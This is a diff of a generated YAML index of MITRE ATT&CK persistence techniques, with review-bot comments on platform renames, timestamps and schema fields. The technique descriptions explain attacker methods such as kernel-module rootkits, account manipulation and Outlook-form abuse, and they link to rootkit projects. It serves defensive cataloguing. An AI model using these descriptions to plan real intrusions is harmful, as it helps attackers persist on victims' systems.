x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.001
atomic_tests: []
T1136.003:
technique:
- modified: '2024-03-28T16:14:28.678Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Create Account: Cloud Account'
description: |-
Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
@@ -32416,9 +32843,11 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Praetorian
- Microsoft Threat Intelligence Center (MSTIC)
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Collect usage logs from cloud user and administrator accounts
to identify unusual activity in the creation of new accounts and assignment
@@ -32427,13 +32856,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- IaaS
- - Google Workspace
- SaaS
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Creation'
type: attack-pattern
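Review bot: `x_mitre_platforms` drops `Azure AD`, `Office 365` and `Google Workspace` in favour of `Office Suite` and `Identity Provider` (the same replacement is made for T1098 in the next hunks). Anything that derives per-platform indexes from this field will stop listing these techniques under the old names; confirm the platform-to-index mapping was updated in the same change so there are no stale per-platform outputs, and that the version bump to `1.6` is the only functional change here.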
@@ -32481,14 +32910,11 @@ persistence:
url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.003
atomic_tests: []
T1098:
technique:
- modified: '2024-01-16T22:24:38.234Z'
+ modified: '2024-10-15T15:35:57.382Z'
name: Account Manipulation
description: "Adversaries may manipulate accounts to maintain and/or elevate
access to victim systems. Account manipulation may consist of any action that
@@ -32524,16 +32950,15 @@ persistence:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- SaaS
- Network
- Containers
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -32574,143 +32999,141 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098
atomic_tests: []
T1547.006:
technique:
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-12T17:30:54.170Z'
+ name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+ description: |-
+ Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
+
+ When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+ Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+ Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+ Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
x_mitre_contributors:
- Wayne Silva, F-Secure Countercept
- Anastasios Pingios
- Jeremy Galloway
- Red Canary
- Eric Kaiser @ideologysec
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: |
+ Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+ Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
+
+ On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'File: File Creation'
+ - 'File: File Modification'
+ - 'Kernel: Kernel Module Load'
+ - 'Process: Process Creation'
+ x_mitre_permissions_required:
+ - root
type: attack-pattern
id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
created: '2020-01-24T17:42:23.339Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1547.006
url: https://attack.mitre.org/techniques/T1547/006
+ external_id: T1547.006
- source_name: Apple Developer Configuration Profile
- url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
September 23, 2021.
+ url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
- source_name: Apple Kernel Extension Deprecation
- url: https://developer.apple.com/support/kernel-extensions/
description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
Alternatives. Retrieved November 4, 2020.
+ url: https://developer.apple.com/support/kernel-extensions/
- source_name: System and kernel extensions in macOS
- url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
March 31, 2022.
+ url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
- source_name: GitHub Reptile
- url: https://github.com/f0rb1dd3n/Reptile
description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
April 9, 2018.
+ url: https://github.com/f0rb1dd3n/Reptile
- source_name: Volatility Phalanx2
- url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+ url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
- source_name: iDefense Rootkit Overview
- url: http://www.megasecurity.org/papers/Rootkits.pdf
description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
- April 6, 2018.
+ September 12, 2024.
+ url: https://www.megasecurity.org/papers/Rootkits.pdf
- source_name: Linux Loadable Kernel Module Insert and Remove LKMs
- url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
description: Henderson, B. (2006, September 24). How To Insert And Remove
LKMs. Retrieved April 9, 2018.
+ url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
- source_name: CrowdStrike Linux Rootkit
- url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
Retrieved December 21, 2017.
+ url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
- source_name: GitHub Diamorphine
- url: https://github.com/m0nad/Diamorphine
description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+ url: https://github.com/m0nad/Diamorphine
- source_name: Securelist Ventir
- url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
your MacOS spy. Retrieved April 6, 2018.'
+ url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
- source_name: User Approved Kernel Extension Pike’s
- url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
Loading…. Retrieved September 23, 2021.
+ url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
- source_name: Linux Kernel Module Programming Guide
- url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
Retrieved April 6, 2018.
+ url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
- source_name: Linux Kernel Programming
- url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
Module Programming Guide. Retrieved April 6, 2018.
+ url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
- source_name: Trend Micro Skidmap
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
Retrieved June 4, 2020.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
- source_name: Purves Kextpocalypse 2
- url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
. Retrieved September 23, 2021.
+ url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
- source_name: RSAC 2015 San Francisco Patrick Wardle
- url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
Retrieved April 6, 2018.
+ url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: Synack Secure Kernel Extension Broken
- url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
Extension Loading’ is Broken. Retrieved April 6, 2018.
+ url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
- source_name: Wikipedia Loadable Kernel Module
- url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
April 9, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
-
- When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
- Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
- Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
- Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
- x_mitre_detection: |
- Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
- Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
-
- On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'File: File Creation'
- - 'File: File Modification'
- - 'Kernel: Kernel Module Load'
- - 'Process: Process Creation'
- x_mitre_permissions_required:
- - root
- x_mitre_attack_spec_version: 2.1.0
+ url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.006
atomic_tests: []
T1574.013:
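Review bot: the visible tail of this hunk deletes T1547.006's `name`, `x_mitre_detection`, `kill_chain_phases`, `x_mitre_data_sources` and `x_mitre_permissions_required` (`- - root`) and only adds back `url`, `object_marking_refs` and `x_mitre_attack_spec_version: 3.2.0`; confirm the deleted fields are re-emitted in the part of the hunk above this excerpt (the generator is clearly reordering keys), otherwise the entry is gutted. If dropping `x_mitre_permissions_required` is intended for objects upgraded to spec 3.2.0, say so in the commit message, because T1547.002 and T1037.005 later in this patch keep the field at 2.1.0.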
@@ -32747,7 +33170,7 @@ persistence:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
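Review bot: `modified` for T1574.013 moves backwards (2022-05-11 → 2022-03-22), and the same happens below for T1542.004 (→ 2020-10-22), T1505.004 (→ 2021-10-17), T1547.002, T1546.015, T1574.009 and T1037.005. A regenerated index should not carry older modification stamps than the one it replaces unless the source changed, so the commit message should state which ATT&CK bundle or which field these timestamps are now taken from; anything downstream that detects updates by comparing `modified` will read these as regressions.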
@@ -32773,12 +33196,10 @@ persistence:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
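Review bot: `x_mitre_attack_spec_version: 2.1.0` is deleted for T1574.013 with no replacement before `atomic_tests: []`, and T1542.004 and T1505.004 lose it the same way, while T1547.002 and T1037.005 keep `2.1.0` and the rest of the patch moves objects to `3.2.0`. Unless the field is re-emitted in the unshown upper part of these three objects, they end up with no ATT&CK spec version at all; either restore it or document that the field is optional for index consumers.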
@@ -32856,9 +33277,8 @@ persistence:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1542.004:
@@ -32885,7 +33305,7 @@ persistence:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T02:18:19.568Z'
name: ROMMONkit
description: |-
Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -32907,41 +33327,10 @@ persistence:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1137.003:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
- type: attack-pattern
- created: '2019-11-07T20:06:02.624Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.003
- url: https://attack.mitre.org/techniques/T1137/003
- - source_name: SensePost Outlook Forms
- url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
- description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
- February 4, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
- - source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
- description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
- provides blue teams with the ability to detect Ruler usage against Exchange.
- Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:02:00.782Z'
name: Outlook Forms
description: |-
Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
@@ -32950,22 +33339,49 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'Process: Process Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
+ created: '2019-11-07T20:06:02.624Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/003
+ external_id: T1137.003
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SensePost NotRuler
+ description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+ provides blue teams with the ability to detect Ruler usage against Exchange.
+ Retrieved February 4, 2019.
+ url: https://github.com/sensepost/notruler
+ - source_name: SensePost Outlook Forms
+ description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
+ February 4, 2019.
+ url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1574:
technique:
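Review bot: the whole T1137.003 object is rewritten because the generator changed its key order (`external_references`, `id`, `created`, `x_mitre_platforms` move from the top of the object to the bottom), which buries the few real value changes (`Office 365` → `Office Suite`, version `1.1` → `1.2`, `x_mitre_deprecated`/`revoked` added, `x_mitre_permissions_required` dropped) in a 70-line hunk pair; T1137.004 and T1546.004 get the same treatment. The ordering is not even consistent: for T1078 `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` move from the middle of the object to the end, for T1556.006 they move from the end to the middle. Emit keys in a fixed (or preserved) order so that future regenerations only show value changes.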
@@ -33031,7 +33447,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.005:
technique:
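Review bot: `spec_version: '2.1'` is removed from every technique object in this patch (this T1574 hunk is the minimal case). `spec_version` is a required common property on STIX 2.1 objects, so anything that loads these entries as STIX will now see malformed or 2.0-shaped objects; if the index is not meant to be consumed as STIX and the drop is deliberate, note that in the commit message and in the generator's documentation.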
@@ -33105,11 +33520,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -33126,7 +33540,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -33136,7 +33549,7 @@ persistence:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -33145,19 +33558,17 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
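Review bot: the platforms `Azure AD`, `Office 365` and `Google Workspace` are replaced by `Office Suite` and `Identity Provider` for T1078 here, and the same rename appears below for T1556.006 and T1546 (`Office 365` → `Office Suite`). Any per-platform index artifact or lookup keyed on the old platform names needs to be regenerated or retired in the same change, and the rename deserves a line in the commit message since it changes which platform bucket these techniques' tests land in.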
@@ -33205,11 +33616,12 @@ persistence:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
